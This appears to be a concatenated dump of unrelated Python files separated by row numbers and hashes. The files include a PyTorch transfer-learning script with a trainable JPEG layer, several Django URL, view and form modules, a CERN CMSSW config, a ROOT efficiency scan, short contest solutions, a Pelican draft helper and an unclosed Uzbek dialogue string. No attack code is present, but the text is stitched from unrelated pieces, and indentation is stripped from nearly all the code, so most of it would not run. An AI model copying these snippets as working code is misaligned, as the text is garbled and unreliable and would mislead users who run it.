# Model Training and Validation Code
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# The ``train_model`` function handles the training and validation of a
# given model. As input, it takes a PyTorch model, a dictionary of
# dataloaders, a loss function, an optimizer, a specified number of epochs
# to train and validate for, and a boolean flag for when the model is an
# Inception model. The *is_inception* flag is used to accomodate the
# *Inception v3* model, as that architecture uses an auxiliary output and
# the overall model loss respects both the auxiliary output and the final
# output, as described
# `here <https://discuss.pytorch.org/t/how-to-optimize-inception-model-with-auxiliary-classifiers/7958>`__.
# The function trains for the specified number of epochs and after each
# epoch runs a full validation step. It also keeps track of the best
# performing model (in terms of validation accuracy), and at the end of
# training returns the best performing model. After each epoch, the
# training and validation accuracies are printed.
#
def train_model(model, dataloaders, criterion, optimizer, num_epochs=25, is_inception=False, train = True):
since = time.time()
val_acc_history = []
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
phases =['train', 'val']
if not train:
phases = ['val']
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
# Each epoch has a training and validation phase
for phase in phases:
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
running_loss = 0.0
running_corrects = 0
# Iterate over data.
for inputs, labels in dataloaders[phase]:
inputs = inputs.to(device)
labels = labels.to(device)
# zero the parameter gradients
if train:
optimizer.zero_grad()
# forward
# track history if only in train
with torch.set_grad_enabled(phase == 'train'):
# Get model outputs and calculate loss
# Special case for inception because in training it has an auxiliary output. In train
# mode we calculate the loss by summing the final output and the auxiliary output
# but in testing we only consider the final output.
#add regularization
reg_loss = 0
factor = 0.1
if args.regularize:
reg_crit = nn.L1Loss(size_average=True)
target = torch.Tensor(3,8,8).cuda()
target.fill_(0)
for name, param in model.named_parameters():
if "quantize" in name:
reg_loss = factor /reg_crit(param,target) * inputs.size(0)
break
if is_inception and phase == 'train':
# From https://discuss.pytorch.org/t/how-to-optimize-inception-model-with-auxiliary-classifiers/7958
outputs, aux_outputs = model(inputs)
loss1 = criterion(outputs, labels)
loss2 = criterion(aux_outputs, labels)
loss = loss1 + 0.4*loss2
else:
outputs = model(inputs)
loss = criterion(outputs, labels)
loss = reg_loss + loss
_, preds = torch.max(outputs, 1)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
# statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
epoch_loss = running_loss / len(dataloaders[phase].dataset)
epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)
print('{} Loss: {:.4f} Acc: {:.4f}'.format(phase, epoch_loss, epoch_acc))
# if(epoch_acc < 0.5):
# for name, param in model.named_parameters():
# if 'quantize' in name:
# print(param*255)
# torch.save(model.state_dict(), 'model.fail')
# sys.exit(0)
# deep copy the model
if phase == 'val' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
if phase == 'val':
val_acc_history.append(epoch_acc)
print()
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(time_elapsed // 60, time_elapsed % 60))
print('Best val Acc: {:4f}'.format(best_acc))
# load best model weights
model.load_state_dict(best_model_wts)
return model, val_acc_history
######################################################################
# Set Model Parameters’ .requires_grad attribute
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# This helper function sets the ``.requires_grad`` attribute of the
# parameters in the model to False when we are feature extracting. By
# default, when we load a pretrained model all of the parameters have
# ``.requires_grad=True``, which is fine if we are training from scratch
# or finetuning. However, if we are feature extracting and only want to
# compute gradients for the newly initialized layer then we want all of
# the other parameters to not require gradients. This will make more sense
# later.
#
def set_parameter_requires_grad(model, first, feature_extract, quant_only=False, cnn_only=False):
if first and feature_extract:
quant_only = True
cnn_only = True
for name, param in model.named_parameters():
if (quant_only and 'quantize' not in name) or\
(cnn_only and 'quantize' in name):
param.requires_grad = False
######################################################################
# Initialize and Reshape the Networks
# -----------------------------------
#
# Now to the most interesting part. Here is where we handle the reshaping
# of each network. Note, this is not an automatic procedure and is unique
# to each model. Recall, the final layer of a CNN model, which is often
# times an FC layer, has the same number of nodes as the number of output
# classes in the dataset. Since all of the models have been pretrained on
# Imagenet, they all have output layers of size 1000, one node for each
# class. The goal here is to reshape the last layer to have the same
# number of inputs as before, AND to have the same number of outputs as
# the number of classes in the dataset. In the following sections we will
# discuss how to alter the architecture of each model individually. But
# first, there is one important detail regarding the difference between
# finetuning and feature-extraction.
#
# When feature extracting, we only want to update the parameters of the
# last layer, or in other words, we only want to update the parameters for
# the layer(s) we are reshaping. Therefore, we do not need to compute the
# gradients of the parameters that we are not changing, so for efficiency
# we set the .requires_grad attribute to False. This is important because
# by default, this attribute is set to True. Then, when we initialize the
# new layer and by default the new parameters have ``.requires_grad=True``
# so only the new layer’s parameters will be updated. When we are
# finetuning we can leave all of the .required_grad’s set to the default
# of True.
#
# Finally, notice that inception_v3 requires the input size to be
# (299,299), whereas all of the other models expect (224,224).
#
# Resnet
# ~~~~~~
#
# Resnet was introduced in the paper `Deep Residual Learning for Image
# Recognition <https://arxiv.org/abs/1512.03385>`__. There are several
# variants of different sizes, including Resnet18, Resnet34, Resnet50,
# Resnet101, and Resnet152, all of which are available from torchvision
# models. Here we use Resnet18, as our dataset is small and only has two
# classes. When we print the model, we see that the last layer is a fully
# connected layer as shown below:
#
# ::
#
# (fc): Linear(in_features=512, out_features=1000, bias=True)
#
# Thus, we must reinitialize ``model.fc`` to be a Linear layer with 512
# input features and 2 output features with:
#
# ::
#
# model.fc = nn.Linear(512, num_classes)
#
# Alexnet
# ~~~~~~~
#
# Alexnet was introduced in the paper `ImageNet Classification with Deep
# Convolutional Neural
# Networks <https://papers.nips.cc/paper/4824-imagenet-classification-with-deep-convolutional-neural-networks.pdf>`__
# and was the first very successful CNN on the ImageNet dataset. When we
# print the model architecture, we see the model output comes from the 6th
# layer of the classifier
#
# ::
#
# (classifier): Sequential(
# ...
# (6): Linear(in_features=4096, out_features=1000, bias=True)
# )
#
# To use the model with our dataset we reinitialize this layer as
#
# ::
#
# model.classifier[6] = nn.Linear(4096,num_classes)
#
# VGG
# ~~~
#
# VGG was introduced in the paper `Very Deep Convolutional Networks for
# Large-Scale Image Recognition <https://arxiv.org/pdf/1409.1556.pdf>`__.
# Torchvision offers eight versions of VGG with various lengths and some
# that have batch normalizations layers. Here we use VGG-11 with batch
# normalization. The output layer is similar to Alexnet, i.e.
#
# ::
#
# (classifier): Sequential(
# ...
# (6): Linear(in_features=4096, out_features=1000, bias=True)
# )
#
# Therefore, we use the same technique to modify the output layer
#
# ::
#
# model.classifier[6] = nn.Linear(4096,num_classes)
#
# Squeezenet
# ~~~~~~~~~~
#
# The Squeeznet architecture is described in the paper `SqueezeNet:
# AlexNet-level accuracy with 50x fewer parameters and <0.5MB model
# size <https://arxiv.org/abs/1602.07360>`__ and uses a different output
# structure than any of the other models shown here. Torchvision has two
# versions of Squeezenet, we use version 1.0. The output comes from a 1x1
# convolutional layer which is the 1st layer of the classifier:
#
# ::
#
# (classifier): Sequential(
# (0): Dropout(p=0.5)
# (1): Conv2d(512, 1000, kernel_size=(1, 1), stride=(1, 1))
# (2): ReLU(inplace)
# (3): AvgPool2d(kernel_size=13, stride=1, padding=0)
# )
#
# To modify the network, we reinitialize the Conv2d layer to have an
# output feature map of depth 2 as
#
# ::
#
# model.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1,1), stride=(1,1))
#
# Densenet
# ~~~~~~~~
#
# Densenet was introduced in the paper `Densely Connected Convolutional
# Networks <https://arxiv.org/abs/1608.06993>`__. Torchvision has four
# variants of Densenet but here we only use Densenet-121. The output layer
# is a linear layer with 1024 input features:
#
# ::
#
# (classifier): Linear(in_features=1024, out_features=1000, bias=True)
#
# To reshape the network, we reinitialize the classifier’s linear layer as
#
# ::
#
# model.classifier = nn.Linear(1024, num_classes)
#
# Inception v3
# ~~~~~~~~~~~~
#
# Finally, Inception v3 was first described in `Rethinking the Inception
# Architecture for Computer
# Vision <https://arxiv.org/pdf/1512.00567v1.pdf>`__. This network is
# unique because it has two output layers when training. The second output
# is known as an auxiliary output and is contained in the AuxLogits part
# of the network. The primary output is a linear layer at the end of the
# network. Note, when testing we only consider the primary output. The
# auxiliary output and primary output of the loaded model are printed as:
#
# ::
#
# (AuxLogits): InceptionAux(
# ...
# (fc): Linear(in_features=768, out_features=1000, bias=True)
# )
# ...
# (fc): Linear(in_features=2048, out_features=1000, bias=True)
#
# To finetune this model we must reshape both layers. This is accomplished
# with the following
#
# ::
#
# model.AuxLogits.fc = nn.Linear(768, num_classes)
# model.fc = nn.Linear(2048, num_classes)
#
# Notice, many of the models have similar output structures, but each must
# be handled slightly differently. Also, check out the printed model
# architecture of the reshaped network and make sure the number of output
# features is the same as the number of classes in the dataset.
#
def initialize_model(model_name, num_classes, feature_extract = False, add_jpeg_layer = False, train_quant_only = False, train_cnn_only=False, rand_qtable = True, quality = 50, use_pretrained=True):
# Initialize these variables which will be set in this if statement. Each of these
# variables is model specific.
model_ft = None
input_size = 0
if model_name == "resnet":
""" Resnet18
"""
model_ft = models.resnet18(pretrained=use_pretrained)
set_parameter_requires_grad(model_ft,\
True, feature_extract)
num_ftrs = model_ft.fc.in_features
model_ft.fc = nn.Linear(num_ftrs, num_classes)
input_size = 448
elif model_name == "alexnet":
""" Alexnet
"""
model_ft = models.alexnet(pretrained=use_pretrained)
set_parameter_requires_grad(model_ft,\
True, feature_extract)
num_ftrs = model_ft.classifier[6].in_features
model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)
input_size = 448
elif model_name == "vgg":
""" VGG11_bn
"""
model_ft = models.vgg11_bn(pretrained=use_pretrained)
set_parameter_requires_grad(model_ft,\
True, feature_extract)
num_ftrs = model_ft.classifier[6].in_features
model_ft.classifier[6] = nn.Linear(num_ftrs,num_classes)
input_size = 448
elif model_name == "squeezenet":
""" Squeezenet
"""
model_ft = models.squeezenet1_0(pretrained=use_pretrained)
set_parameter_requires_grad(model_ft,\
True, feature_extract)
model_ft.classifier[1] = nn.Conv2d(512, num_classes, kernel_size=(1,1), stride=(1,1))
model_ft.num_classes = num_classes
input_size = 448
elif model_name == "densenet":
""" Densenet
"""
model_ft = models.densenet121(pretrained=use_pretrained)
set_parameter_requires_grad(model_ft,\
True, feature_extract)
num_ftrs = model_ft.classifier.in_features
model_ft.classifier = nn.Linear(num_ftrs, num_classes)
input_size = 448
elif model_name == "inception":
""" Inception v3
Be careful, expects (299,299) sized images and has auxiliary output
"""
model_ft = models.inception_v3(pretrained=use_pretrained)
set_parameter_requires_grad(model_ft,\
True, feature_extract)
# Handle the auxilary net
num_ftrs = model_ft.AuxLogits.fc.in_features
model_ft.AuxLogits.fc = nn.Linear(num_ftrs, num_classes)
# Handle the primary net
num_ftrs = model_ft.fc.in_features
model_ft.fc = nn.Linear(num_ftrs,num_classes)
input_size = 299
else:
print("Invalid model name, exiting...")
exit()
if add_jpeg_layer:
if train_quant_only and not train_cnn_only:
model_ft.load_state_dict(torch.load("model.final"))
# if loadfull:
# model_ft.load_state_dict(torch.load("model.final"))
# model_ft = model_ft[1]
model_ft = nn.Sequential(JpegLayer( \
rand_qtable = rand_qtable, cnn_only = train_cnn_only, quality = quality),\
model_ft)
set_parameter_requires_grad(model_ft,\
False, feature_extract,
train_quant_only, train_cnn_only)
# model_ft.load_state_dict(torch.load("model.fail"))
return model_ft, input_size
# Initialize the model for this run
model_ft, input_size = initialize_model(args.model_name, args.num_classes, feature_extract, args.add_jpeg_layer, args.quant_only, args.cnn_only, args.rand_qtable, args.quality, use_pretrained=True)
# Print the model we just instantiated
print(model_ft)
######################################################################
# Load Data
# ---------
#
# Now that we know what the input size must be, we can initialize the data
# transforms, image datasets, and the dataloaders. Notice, the models were
# pretrained with the hard-coded normalization values, as described
# `here <https://pytorch.org/docs/master/torchvision/models.html>`__.
#
# Data augmentation and normalization for training
# Just normalization for validation
data_transforms = {
'train': transforms.Compose([
transforms.RandomResizedCrop(input_size),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
#transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.Resize(256),
transforms.CenterCrop(input_size),
transforms.ToTensor(),
#transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
print("Initializing Datasets and Dataloaders...")
# Create training and validation datasets
image_datasets = {x: datasets.ImageFolder(os.path.join(args.data_dir, x), data_transforms[x]) for x in ['train', 'val']}
# Create training and validation dataloaders
dataloaders_dict = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=args.batch_size, shuffle=True, num_workers=4) for x in ['train', 'val']}
# Detect if we have a GPU available
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
######################################################################
# Create the Optimizer
# --------------------
#
# Now that the model structure is correct, the final step for finetuning
# and feature extracting is to create an optimizer that only updates the
# desired parameters. Recall that after loading the pretrained model, but
# before reshaping, if ``feature_extract=True`` we manually set all of the
# parameter’s ``.requires_grad`` attributes to False. Then the
# reinitialized layer’s parameters have ``.requires_grad=True`` by
# default. So now we know that *all parameters that have
# .requires_grad=True should be optimized.* Next, we make a list of such
# parameters and input this list to the SGD algorithm constructor.
#
# To verify this, check out the printed parameters to learn. When
# finetuning, this list should be long and include all of the model
# parameters. However, when feature extracting this list should be short
# and only include the weights and biases of the reshaped layers.
#
# Send the model to GPU
model_ft = model_ft.to(device)
# Gather the parameters to be optimized/updated in this run. If we are
# finetuning we will be updating all parameters. However, if we are
# doing feature extract method, we will only update the parameters
# that we have just initialized, i.e. the parameters with requires_grad
# is True.
params_to_update = [] #model_ft.parameters()
print("Params to learn:")
for name,param in model_ft.named_parameters():
if param.requires_grad == True:
params_to_update.append(param)
print('\t',name)
iftrain = not(args.quant_only and args.cnn_only)
if iftrain:
# Observe that all parameters are being optimized
#if train_quant_only:
#optimizer_ft = optim.Adam(params_to_update, lr = 0.0001)
#else:
optimizer_ft = optim.SGD(params_to_update, lr = 0.0005, momentum=0.9)
else:
optimizer_ft = None
# optim.SGD([{'params': params_to_update},\
# {'params': params_quantize, 'lr': 0.005, 'momentum':0.9}], lr=0.0005, momentum=0.9)
######################################################################
# Run Training and Validation Step
# --------------------------------
#
# Finally, the last step is to setup the loss for the model, then run the
# training and validation function for the set number of epochs. Notice,
# depending on the number of epochs this step may take a while on a CPU.
# Also, the default learning rate is not optimal for all of the models, so
# to achieve maximum accuracy it would be necessary to tune for each model
# separately.
#
# Setup the loss fxn
criterion = nn.CrossEntropyLoss()
# Train and evaluate
model_ft, hist = train_model(model_ft, dataloaders_dict, criterion, optimizer_ft, num_epochs=args.num_epochs, is_inception=(args.model_name=="inception"), train = iftrain)
if args.cnn_only == True and iftrain:
torch.save(model_ft.state_dict(), "model.final")
#print the trained quantization matrix
if args.qtable:
print('--------- the trained quantize table ---------')
for name,param in model_ft.named_parameters():
if param.requires_grad == True and\
name == "0.quantize":
print('Y',param.data[0]*255)
print('Cb',param.data[1]*255)
print('Cr',param.data[2]*255)
break
# Let's visualize feature maps after jpeg layer
def get_activation(name):
def hook(model, input, output):
activation[name] = output.detach()
return hook
if args.add_jpeg_layer:
activation = {}
model_ft[0].register_forward_hook(get_activation('0.JpegLayer'))
data, _ = image_datasets["val"][0]
f1 = data.cpu().data.numpy()
f1 = (np.transpose(f1,(1,2,0))*255).astype(np.uint8)
data.unsqueeze_(0)
output = model_ft(data.to(device))
f2 = activation['0.JpegLayer'].squeeze().cpu().data.numpy()
f2 = (np.transpose(f2, (1,2,0))*255).astype(np.uint8)
if args.visualize:
fig, axarr = plt.subplots(2)
axarr[0].imshow(f1)
axarr[1].imshow(f2)
plt.show()
#save images
from psnr import psnr, compressJ, save
from PIL import Image
save(f1, "org.bmp")
save(f2, "myJpeg.jpg")
###############################
##### standard python jpeg ####
###############################
#im = compressJ(f1,"toJpeg.jpg")
#im = np.array(im, np.int16).transpose(2,0,1)
#
##############################
##### psnr ####
##############################
#f1 = np.array(f1,np.int16).transpose(2,0,1)
#f2 = np.array(f2,np.int16).transpose(2,0,1)
#print("compression results!")
#print("PSNR - my jpeg: ", psnr(f2[0],f1[0]))
#print("PSNR - PIL jpeg", psnr(im[0], f1[0]))
#print("PSNR - my vs. PIL", psnr(im[0], f2[0]))
#######################################################################
## Comparison with Model Trained from Scratch
## ------------------------------------------
##
## Just for fun, lets see how the model learns if we do not use transfer
## learning. The performance of finetuning vs. feature extracting depends
## largely on the dataset but in general both transfer learning methods
## produce favorable results in terms of training time and overall accuracy
## versus a model trained from scratch.
##
#
#
## Initialize the non-pretrained version of the model used for this run
#scratch_model,_ = initialize_model(model_name, num_classes, feature_extract=False, use_pretrained=False)
#scratch_model = scratch_model.to(device)
#scratch_optimizer = optim.SGD(scratch_model.parameters(), lr=0.001, momentum=0.9)
#scratch_criterion = nn.CrossEntropyLoss()
#_,scratch_hist = train_model(scratch_model, dataloaders_dict, scratch_criterion, scratch_optimizer, num_epochs=num_epochs, is_inception=(model_name=="inception"))
#
## Plot the training curves of validation accuracy vs. number
## of training epochs for the transfer learning method and
## the model trained from scratch
#ohist = []
#shist = []
#
#ohist = [h.cpu().numpy() for h in hist]
#shist = [h.cpu().numpy() for h in scratch_hist]
#
#plt.title("Validation Accuracy vs. Number of Training Epochs")
#plt.xlabel("Training Epochs")
#plt.ylabel("Validation Accuracy")
#plt.plot(range(1,num_epochs+1),ohist,label="Pretrained")
#plt.plot(range(1,num_epochs+1),shist,label="Scratch")
#plt.ylim((0,1.))
#plt.xticks(np.arange(1, num_epochs+1, 1.0))
#plt.legend()
#plt.show()
#
######################################################################
# Final Thoughts and Where to Go Next
# -----------------------------------
#
# Try running some of the other models and see how good the accuracy gets.
# Also, notice that feature extracting takes less time because in the
# backward pass we do not have to calculate most of the gradients. There
# are many places to go from here. You could:
#
# - Run this code with a harder dataset and see some more benefits of
# transfer learning
# - Using the methods described here, use transfer learning to update a
# different model, perhaps in a new domain (i.e. NLP, audio, etc.)
# - Once you are happy with a model, you can export it as an ONNX model,
# or trace it using the hybrid frontend for more speed and optimization
# opportunities.
#
|
15,624 | b5637d4d7acc66452e3d916b90f5cb3aecc3aa53 | from django.urls import path
from .views import TaskDelete, TaskDetails, TaskList, TaskCreate, TaskUpdate, TaskLogin, UserRegisterPage
from django.contrib.auth.views import LogoutView
urlpatterns = [
path('login/', TaskLogin.as_view(), name="login"),
path('logout/', LogoutView.as_view(next_page='login'), name="logout"),
path('register/', UserRegisterPage.as_view(), name="register"),
path('', TaskList.as_view(), name="tasks"),
path('task/<int:pk>', TaskDetails.as_view(), name="task"),
path('create-task/', TaskCreate.as_view(), name="create-task"),
path('task-update/<int:pk>', TaskUpdate.as_view(), name="update-task"),
path('task-delete/<int:pk>', TaskDelete.as_view(), name="delete-task"),
]
|
15,625 | 36bf016c23832d3f18cf5eb1903f342f54738f4b | # Compares two strings for equality while checking for errors
import sys
from cs50 import get_string
# Get a string
s = get_string("s: ")
if s is None:
sys.exit(1)
# Get another string
t = get_string("t: ")
if t is None:
sys.exit(1)
# Compare strings for equality
if s == t:
print("same")
else:
print("different")
|
15,626 | 3c8f6a7edbb8c4aa85e0da10e9fa1a01c784647e | import FWCore.ParameterSet.Config as cms
import os
process = cms.Process("summary")
process.MessageLogger = cms.Service("MessageLogger",
cerr = cms.untracked.PSet(
enable = cms.untracked.bool(False)
),
cout = cms.untracked.PSet(
enable = cms.untracked.bool(True),
threshold = cms.untracked.string('DEBUG')
),
debugModules = cms.untracked.vstring('*')
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(1)
)
process.source = cms.Source("EmptySource",
numberEventsInRun = cms.untracked.uint32(1),
firstRun = cms.untracked.uint32(1)
)
process.load("CondCore.CondDB.CondDB_cfi")
process.load("CalibTracker.SiStripDCS.siStripDetVOffPrinter_cfi")
process.siStripDetVOffPrinter.tagName = "SiStripDetVOff_13hourDelay_v1_Validation"
process.siStripDetVOffPrinter.startTime = "2018.08.09 18:20:00"
process.siStripDetVOffPrinter.endTime = "2018.08.09 22:14:00"
# process.DetVOffSummary = cms.EDAnalyzer( "SiStripDetVOffPrinter",
# process.CondDB,
# conditionDatabase = cms.string("frontier://FrontierProd/CMS_CONDITIONS"),
# # Add the tag
# tagName = cms.string("SiStripDetVOff_1hourDelay_v1_Validation"),
# # Start and end time
# # Time format: "2002-01-20 23:59:59.000" (UTC).
# startTime = cms.string("2018.08.09 18:20:00"),
# endTime = cms.string("2018.08.09 22:14:00"),
# # Set output file name. Leave empty if do not want to dump HV/LV counts in a text file.
# output = cms.string("PerModuleSummary.txt")
# )
process.p = cms.Path(process.siStripDetVOffPrinter)
|
15,627 | 5129caaefa43942dd5b64167b8c12160b9e1d6cf | '''
Created on 29-06-2014
@author: carriagadad
'''
# some_app/views.py
from django.views.generic import TemplateView
class CreateUserView(TemplateView):
template_name = "oclock/create_user.html"
class LoginUserView(TemplateView):
template_name = "oclock/login_user.html"
class RegisterUserView(TemplateView):
template_name = "oclock/login_user.html"
class MainView(TemplateView):
template_name = "oclock/main_page.html"
|
15,628 | 5a4daac04fe34908d418768a7cec5bbc75fa76eb | import ROOT
from ROOT import TCanvas, TGraph
from ROOTDefs import get_po_signal_et_background_files
from ROCCurveDefs import create_roc_counter, roc_efficiencies_from_cuts
from tqdm import tqdm
import numpy as np
'''
Manually "train" weights to minimize the background efficiency at 90% signal efficiency. Not using a neural network
module because they cannot train on this directly.
'''
c1 = TCanvas("c1", "Graph Draw Options", 200, 10, 600, 400)
tsig, fsig, tback, fback = get_po_signal_et_background_files()
netcuts = 100
init_weights = [1, 1, 1, 1, 1]
l0_weight_range = [i*0.1 for i in range(21)]
efficiencies = []
print(l0_weight_range)
for l0_weight in tqdm(l0_weight_range):
new_weights = [l0_weight, 1, 1, 1, 1]
tsig.set_reco_et_layer_weights(new_weights)
tback.set_reco_et_layer_weights(new_weights)
sig_cuts = create_roc_counter(tsig, netcuts, -20, 100, 0)
back_cuts = create_roc_counter(tback, netcuts, -20, 100, 0)
sig_eff, back_eff = roc_efficiencies_from_cuts(sig_cuts, back_cuts)
for i in range(netcuts):
if sig_eff[i] < 0.9:
print(l0_weight)
print(back_eff[i])
efficiencies.append(back_eff[i])
break
l0_weight_range = np.array(l0_weight_range)
efficiencies = np.array(efficiencies)
gr = TGraph(11, l0_weight_range, efficiencies)
gr.SetTitle('Background Efficiency (@ 90% Signal Efficiency) vs. L0 Weights')
gr.GetXaxis().SetTitle('L0 Weight')
gr.GetYaxis().SetTitle('Background Eff')
gr.Draw('A*')
c1.Print('ManualTester0-2.pdf') |
15,629 | 5b918f95f8d408b9f6478bbd6f976c62a5685c92 | from django import forms
from .models import AD, Service_center, Report_problem
class ADForm(forms.ModelForm):
class Meta:
model = AD
fields = ['name', 'phone', 'content']
class Service_center_Form(forms.ModelForm):
class Meta:
model = Service_center
fields = ['name', 'phone', 'content']
class Report_problem_Form(forms.ModelForm):
class Meta:
model = Report_problem
fields = ['reason', 'other_reason']
|
15,630 | 1e3e0d701d69f22319a5eebd5af68e8f3fe45795 | from django.contrib.auth.views import LoginView, auth_login
from django.shortcuts import render, redirect
from django.views.generic.base import logger
from .forms import *
# Create your views here.
def index(request):
return render(request, 'index.html', {})
def login_index(request):
return render(request, 'login_index.html', {})
def about(request):
return render(request, 'about.html', {})
def accomodation(request):
return render(request, 'accommodation.html', {})
def blog(request):
return render(request, 'blog.html', {})
def blogsingle(request):
return render(request, 'blog-single.html', {})
def contact(request):
return render(request, 'contact.html', {})
def elements(request):
return render(request, 'elements.html', {})
def gallery(request):
return render(request, 'gallery.html', {})
class CustomLoginView(LoginView):
"""
Custom login view.
"""
form_class = LoginForm
template_name = 'HotelsApp/account/login.html'
def get(self, request, *args, **kwargs):
if self.request.user.is_authenticated and self.request.user.is_staff: # and has_2fa(self.request):
return redirect('{}'.format(self.request.GET.get('next', 'HotelsApp:login_index')))
return super(CustomLoginView, self).get(request, *args, **kwargs)
def form_valid(self, form):
if self.request.user.is_staff: # and not has_2fa(self.request):
logger.info('is staff but does not have 2FA, redirecting to Authority account creator')
auth_login(self.request, form.get_user(), backend='django.contrib.auth.backends.ModelBackend')
return redirect('2fa_register')
return super(CustomLoginView, self).form_valid(form)
def user_profile(request):
return render(request, 'HotelsApp/account/user_profile.html', {})
def login(request):
return render(request, 'HotelsApp/account/login.html', {})
def logout(request):
return render(request, 'HotelsApp/account/logged_out.html', {})
def password_reset_complete(request):
return render(request, 'HotelsApp/account/password_reset_complete.html', {})
def password_reset_confirm(request):
return render(request, 'HotelsApp/account/password_reset_confirm.html', {})
def password_reset_done(request):
return render(request, 'HotelsApp/account/password_reset_done.html', {})
def password_reset_email(request):
return render(request, 'HotelsApp/account/password_reset_email.html', {})
def password_reset_form(request):
return render(request, 'HotelsApp/account/password_reset_form.html', {})
|
15,631 | 3bfeae601422c7e48ddb769cb634463dc325b9a6 | """Check module for build type."""
# Official Libraries
from argparse import Namespace
# My Modules
from stobu.types.build import BuildType
__all__ = (
'has_build_of',
)
# Main
def has_build_of(args: Namespace, build: BuildType) -> bool:
assert isinstance(args, Namespace)
assert isinstance(build, BuildType)
if BuildType.NOVEL is build:
return args.novel
elif BuildType.OUTLINE is build:
return args.outline
elif BuildType.PLOT is build:
return args.plot
elif BuildType.SCRIPT is build:
return args.script
elif BuildType.STRUCT is build:
return args.struct
elif BuildType.SCENE_INFO is build:
return args.info
elif BuildType.STATUS_INFO is build:
return args.status
else:
return False
|
15,632 | b49115a8d12d0120c51def139347844d21348fe6 | Following PEP 8 styling guideline.
A simple way to select a random item from a `list/tuple` data stucture
Get the most of `float`s
Looping techniques
`weakref` callbacks |
15,633 | c30f216bb5426d4ef20300e1f0df83bb1a1baa24 | listMat = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
for i in range(3):
print()
for j in range(4):
print(listMat[i][j],end="\t")
|
15,634 | 7a92f7072f6b5ce618cceabeaa6d4c02a239054e | # 10.03.2020 @odnaks
n = int(input())
str = input()
arr = str.split()
max = 0
for i in range(n):
if int(arr[i]) > max:
max = int(arr[i])
sum = 0
for i in range(n):
sum = sum + (max - int(arr[i]))
print(sum)
|
15,635 | c46fe919b77bd6a4b1781169597325d5148b4ab8 | t = int(input())
n = int(input())
a = list(map(int, input().split()))
m = int(input())
b = list(map(int, input().split()))
if m > n:
print('no')
else:
for i in b:
temp = True
for j in a:
if j <= i <= j + t:
a.remove(j)
temp = False
break
if temp:
print('no')
exit()
print('yes')
|
15,636 | c0da2550480bdc3e4f059623e77fd261465baec1 | def is_triplet(t):
a, b, c = t
if not a < b < c:
return False
return a**2 + b**2 == c**2 and a + b + c == 1000
from itertools import combinations
a = combinations(range(200, 500), 3)
a = filter(is_triplet, a)
a = next(a)
print(a, sum(a))
|
15,637 | 2d1225f46b0ac7b30482ac12818fba9c70293f96 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from datetime import datetime
from os.path import abspath, dirname, join, exists
from slugify import slugify
from subprocess import call, PIPE
import sys
THIS_DIR = abspath(dirname(__file__))
CONTENT_DIR = join(THIS_DIR, 'articles', 'content')
ARTICLE_HEADER = '''\
Title: {title}
Date: {date}
Author: markos
Category:
Slug: {slug}
Status: draft
Tags:
'''
EDITOR = '/usr/local/bin/macdown'
def create_slug(title, dir):
slug = base_slug = slugify(title)
filename = join(CONTENT_DIR, slug + '.md')
count = 1
while exists(filename):
slug = "{0}-{1}".format(base_slug, count)
filename = join(CONTENT_DIR, slug + '.md')
count += 1
return (slug, filename)
def create_draft(filename, metadata):
header = ARTICLE_HEADER.format(**metadata)
with open(filename, 'w') as f:
f.write(header)
def open_editor(filename):
cmd = "{0} {1}".format(EDITOR, filename)
call(cmd, shell=True, stdout=PIPE)
def main(title):
now = datetime.now()
date = now.isoformat().replace("T", " ").split(".")[0]
metadata = {
'title': title,
'date': date
}
slug, filename = create_slug(title, CONTENT_DIR)
metadata['slug'] = slug
create_draft(filename, metadata)
open_editor(filename)
if __name__ == '__main__':
if len(sys.argv) != 2:
print 'You have to pass title of the article as first parameter'
sys.exit(1)
title = sys.argv[1]
main(title)
|
15,638 | 908510f5b469f6e4e61cb8bc2df778f84428a4f4 | a = """To'g'ri, bu unchalik o'xshamasligi mumkin, lekin bu ho'l tosh to'plami
bir nechta kutilmagan hodisalar
faqat ojizlar uchun emas
holsiz
Ko'ryapsizmi, ko'pchilik odamlar chayqalish yoki igna chizish kabi sevimli mashg'ulotlaridan qayerda zavqlanishadi, biz ajdaho poygasini afzal ko'ramiz
odamlar
ajdaho poygasi deb atashni yoqtiradigan kichik narsa
u bu erda hidlay boshlaydi
hidi
Yo'q, hali ham sizni yomon ko'raman.
bu joyni puflaylik
puflamoq
katta gap uni qo'rqitdi, to'g'rimi?
u sizni tiriklayin ko'mishga harakat qilmadimi?
faqat bir necha soat
endi, ajdaho bu erda biroz muammo bo'lgan, lekin bu besh yil oldin bo'lgan
va, albatta, nima uchun ular unday emas
bizda maxsus otxonalar bor, siz hamma ovqatlantiradigan joylarni eyishingiz mumkin, ajdarni to'liq yuvish xizmati
hatto yong'inning oldini olish, agar men buni o'zim aytgan bo'lsam
biz hali ham bu narsani yuta olamiz
yuqoriga
Mana, azizim
mendan boshqa
butun shon -shuhratimni o'g'irlashga urinishni bas qiling
har doim hamma narsani buzadi
bu mening bo'lajak kelinim
berk deyarli mukammaldir
barcha mehnatim o'z samarasini berdi
dunyo shunchaki kattalashib ketdi
Siz bunga boshqa zarba bermoqchimisiz
bu ajoyib
endi hayratlanarli emas
bu haqiqatan ham hech qaerdan paydo bo'lmagan
biz u erda sizning yakkaxon sayohatingiz ustida ishlashimiz kerak
